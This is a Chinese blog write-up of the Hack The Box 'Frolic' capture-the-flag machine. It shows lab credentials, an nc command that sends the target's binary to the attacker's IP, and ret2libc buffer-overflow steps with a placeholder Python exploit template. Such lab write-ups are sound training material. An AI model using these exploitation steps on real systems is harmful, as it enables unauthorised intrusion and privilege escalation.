Hack the box靶机 Frolic

最新推荐文章于 2022-02-28 23:53:24 发布
最新推荐文章于 2022-02-28 23:53:24 发布
阅读量223 收藏
点赞数
分类专栏: Hack the box
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38005854/article/details/106363406
版权

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

在这里插入图片描述

admin:superduperlooperpassword_lol

在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

admin:imnothuman
上面那一堆?!是Ook!语言

在这里插入图片描述在这里插入图片描述

在这里插入图片描述在这里插入图片描述

在这里插入图片描述

在这里插入图片描述在这里插入图片描述在这里插入图片描述

漏洞可以利用

在这里插入图片描述

在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

52字节

在这里插入图片描述在这里插入图片描述

整理一下缓冲区溢出利用过程
kali nc -lp 1234 > rop
靶机  nc 10.10.16.118 1234 < rop

收到rop后
kali机器需要的文件
/usr/share/metasploit-framework/tools/exploit/
文件夹下两个文件
1.pattern_create.rb   #生成字符串
2.pattern_offset.rb   #定位字符串

kali机器操作
1../pattern_create.rb -l 150
2.chmod +x rop
3.gdb ./rop
4.alsr
5.pdisass main
6.checksec
7.r '生成的字符串'
8../pattern_offset.rb -q 最后一行字符串
得到了字节个数

靶机操作
1.ldd /home/ayush/.binary/rop |grep libc		 			   #得到字符串1
2.readelf -s /lib/i386-linux-gnu/libc.so.6 | grep ”system@“	   #得到字符串2
3.readelf -s /lib/i386-linux-gnu/libc.so.6 | grep “exit@”  	   #得到字符串3
4.strings -tx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"   #得到字符串4


利用脚本
#!/usr/bin/python

import struct

buf = "A" * 字符串定位数值
system =  addr(字符串1 + 字符串2)
exit =  addr(字符串1 + 字符串3)
shell =  addr(字符串1 +  字符串4)
print buf + system + exit + shell

wget上传脚本到/tmp
chmod +x exploit.py
/home/ayush/.binary/rop $(python /tmp/exploit.py)
菜浪马废
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox - frolic (考点: 信息搜集 & ook解密 & base解密 &zip 解密 & xxd解密 & brainfuck解密 & playsms安全)
冬萍子癸水
05-14 1805
1 扫描 22想到可能有ssh登录,139 445想到smb利用,web开在了9999进去搜集信息 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |
Hack The Box】Linux练习-- Frolic
人间体佐菲的博客
11-21 526
Hack The Box】Linux练习-- Frolic
No.140-HackTheBox-Linux-Frolic-Walkthrough渗透学习
qq_34801745的博客
06-19 272
** HackTheBox-Linux-Frolic-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/158 靶机难度:中级(2.4/10) 靶机发布日期:2019年3月23日 靶机描述: Frolic is not overly challenging, however a great deal of enumeration is required due to the amount of services and c
Hack the box靶机 Blunder
菜浪马废的博客
09-20 418
-更新CMS -关闭FTP-完成 -删除旧用户-完成 -通知弗格斯,新博客需要图片-待定 fergus应该是用户名 找到登录界面 bludit 3.9.2爆破脚本 #!/usr/bin/env python3 import re import requests #from __future__ import print_function def open_ressources(file_path): return [item.replace("\n", "") for item in ope..
渗透测试之靶机试炼(一)
simple___sunny的博客
01-10 1万+
1
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
平台的核心功能包括: 虚拟靶场: Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到
最新发布
06-22
Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到的各种系统配置和安全漏洞。 参与者需要利用自己的知识和工具来破解这些虚拟机,找到所谓的“flag”(通常是文本文件),并提交到...
平台的核心功能包括:虚拟靶场:Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到
06-22
Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到的各种系统配置和安全漏洞。 参与者需要利用自己的知识和工具来破解这些虚拟机,找到所谓的“flag”(通常是文本文件),并提交到...
OSCP备考-2
一个安全路上的菜鸟
11-30 564
继续HTB 这一道题也挺简单。还是经验少不知道这个漏洞 常规namp root@kali:~/Desktop# nmap -sV -T4 10.10.10.56 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-30 07:54 EST Nmap scan report for 10.10.10.56 Host is up (0.25s lat...
HTB靶机渗透
萍水间人的小天地
02-18 1038
信息收集 这里可以先设置一下hosts文件 10.10.10.168 obscure.htb 扫描端口发现开放了 8080 的web端口 页面提示有一个源码泄露 Message to server devs: the current source code for the web server is in 'SuperSecureServer.py' in the secret ...
白菜新手渗透测试靶机练习bulldog1
weixin_43912601的博客
09-01 597
步骤 1.信息收集:ip 端口 服务 操作系统 版本 2.漏洞扫描或漏洞发现:eg:ms17-010 3.漏洞利用:拿到shell 4.提权 5.留后门,清痕迹 6.渗透测试报告 主机发现: dhclient 动态获取ip netdiscover -i eth0 -r 192.168.68.0/24 nmap 192.168.68.0/24 -sn nmap -T4 -sV -O -p 80,2...
OSCP备考-1
一个安全路上的菜鸟
11-30 1048
Hackthebox 整起 最简单的一题
Hack The Box 靶机
PJF1501105594的博客
10-24 2190
Hack The Box 邀请码获取 控制台执行makeInviteCode() 查看返回的json data 然后按照对应的编码格式进行解码,按照要求进行获取邀请码即可 see: https://www.jianshu.com/p/1201a0d2cdfe hackthebox 入门攻略: https://www.360zhijia.com/anquan/439315.html h...
oscp——Hacker Fest: 2019
王嘟嘟的博客
01-28 438
0x00 前言 这个是第十四台机子,真的,这个是我做过的最简单的机子了,没有之一,适合练手~ 最后 ..... ..... ..!?! !.?.. ..... ..... ?.?!. ?.... !.!!! !!!!. ?.... ...!? !!.?. ..... ?.?!. ?.... ..... ...!. ..... ..... ....! .!!!! !!!!! !!!!! !...! ...
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
一点说明
冬萍子癸水
04-14 478
部分标题特意注明“不用msf”, 是因为那些靶机绝大多数人用了msf。搜那些靶机的其他渗透过程文章writeup/walkthrough就可以看出来 所以我加上“不用msf”以作一点区别。显眼一点。在你渗透那些靶机,希望不用msf时,能从我的文章里找到一些思路。。。 当然msf是很方便的,希望大家早日考过oscp,然后就可以放飞自我,msf用的飞起了。。。。。 然而,现在的团队作战,基本是用CS了...
渗透测试靶机实战---系统篇01
一杯咖啡的渗透记忆
10-12 1948
渗透测试靶机实战---01 渗透测试前期准备工作: 1. 靶机搭建 (网上很多,可直接找到现成的,具体搭建过程略过) 2. OpenVAS 扫描靶机得出漏洞报告 1. OpenVas 搭建步骤可参照:https://blog.51cto.com/linhong/2134910?source=drh 2. 报告地址:https://download.csdn.net/d...
hack the box three
07-28
回答: 根据提供的引用内容,我了解到"Hack The Box"是一个在线平台,提供了一系列的虚拟机供用户进行渗透测试和漏洞利用的训练。根据引用\[1\]中的信息,可能涉及到nmap扫描、访问靶机地址、查看/etc/hosts、使用gobuster工具等操作。此外,引用\[2\]提到了一种利用fail2ban进行提权的方法,可以通过该链接了解更多细节。引用\[3\]中提到了读取/etc/passwd文件和尝试读取/home/michael/user.txt文件的尝试。请注意,这些信息仅供参考,具体的操作和步骤可能需要进一步的研究和实践。 #### 引用[.reference_title] - *1* [Hackthebox Three](https://blog.csdn.net/lixiangshidie/article/details/128482447)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Hackthebox Trikc攻略](https://blog.csdn.net/qq_44641654/article/details/127249782)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值